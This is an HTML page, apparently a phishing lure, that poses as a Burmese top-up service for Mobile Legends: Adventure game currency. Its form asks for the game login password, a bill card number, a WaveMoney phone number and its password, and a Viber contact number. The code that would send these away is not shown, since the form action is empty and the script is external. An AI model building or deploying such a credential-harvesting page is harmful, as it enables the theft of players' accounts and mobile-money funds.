<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>BlackSEX</title>
    <link
      rel="stylesheet"
      type="text/css"
      href="https://fonts.googleapis.com/css?family=Roboto:300&display=swap"
    />
   
    <link rel="stylesheet" href="register.css" />
  </head>
  <body>
    <nav>
      <a href="">
        <h1>Black<span>SEX</span></h1>
      </a>
    </nav>
    <div class="container">
      <section class="description">
        <img src="photo.jpg" alt="" />
        <p>
          Mobile Legends : Adventureရဲ့ M-CashကိုTopupလိုက်စို့နော့်!iOS နှင့်
          Androidရဲ့ ပလက်ဖောင်းအကြား အသုံးပြုနိုင်သော ငွေပေးချေစနစ်
          ဖြစ်ပါသည်။Mobile Legends : Adventure M-Cashကို[MPT, Telenor, Ooredoo,
          Mytel,Wave Money နှင့် easyPoints]များအသုံးပြုပြီး ပေးချေလိုက်ပါ။
        </p>
      </section>
      <form action="">
        <div class="step1 step">
          <h2 class="circle"><span>1</span></h2>
          <input type="text" placeholder="Phone or Email" />
          <input type="password" placeholder="Password" />
          <p>Login လုပ်ဖို့ အတွက်မရှိ မဖြစ်လိုအပ် ပါသည်။</p>
        </div>
        <div class="step2 step">
          <h2 class="circle"><span>2</span></h2>
          <div class="collection">
            <div class="type">
              <h2 class="L "  id="platinum"><span>L</span></h2>
              <img
                src="platinum.png"
                alt="platinum"
                class="platinum"
                id="platinum-image"         
                onclick="platinumUser(this)"
              />
            </div>
            <div class="type">
              <h2 class="L"  id="gold"><span>L</span></h2>
              <img
                src="gold.png"
                alt="gold"
                class="gold"
                id="gold-image"         
                onclick="goldUser(this)"
              />
            </div>
          </div>
          <small>
            <span>Platinum User - 5000 KS</span>
            <br>
            <span>Gold User - 10000 KS<span/>
          </small>
        </div>
        <div class="step">
          <h2 class="circle"><span>3</span></h2>
          <h3>ငွေပေးချေမှု ရွေးရန်</h3>
          <div class="collection">
            <div class="type">
              <h2 class="L mark" id="mytelMark"><span>L</span></h2>
              <img src="mytel.png" alt="" class="gold payment" onclick="mytel(this)" id="mytelImage"/>
            </div>
            <div class="type">
              <h2 class="L mark" id="wavemoneyMark"><span>L</span></h2>
              <img src="wave.png" alt="" class="platinum payment" onclick="waveMoney(this)" id="wavemoneyImage"/>
            </div>
          </div>
        </div>
        <div class="step">
          <h2 class="circle"><span>4</span></h2>
          <div class="pay">
            <div class="pay-bill">
              <p>Bill Card ကို ရိုက်ထည့်ပါ</p>
              <input type="text"  maxlength="16" placeholder="12345..."/>
            </div>
            <div class="pay-wave">
              <p>သင်လွဲခဲ့သောWaveMoney Information ဖြည့်ပေးပါ</p>
              <input type="text" placeholder="Ph No (09xxx)" maxlength="11">
              <input type="text" placeholder="WaveMoney Password" maxlength="6">
            </div>
          </div>
        </div>
        <div class="step-5 step">
          <h2 class="circle"><span>5</span></h2>
          <p>သင့်ကိုဆက်သွယ်ဖို့ သင့်ရဲ့ Viber Phone Number ဖြည့်ပါ </p>
          <input type="tel" placeholder="+959xxx" />
          <div class="button">
              <input type="submit" value="Register">
          </div>
        </div>
      
      </form>
    </div>
  </body>

  <script src="register.js"></script>
 
</html>
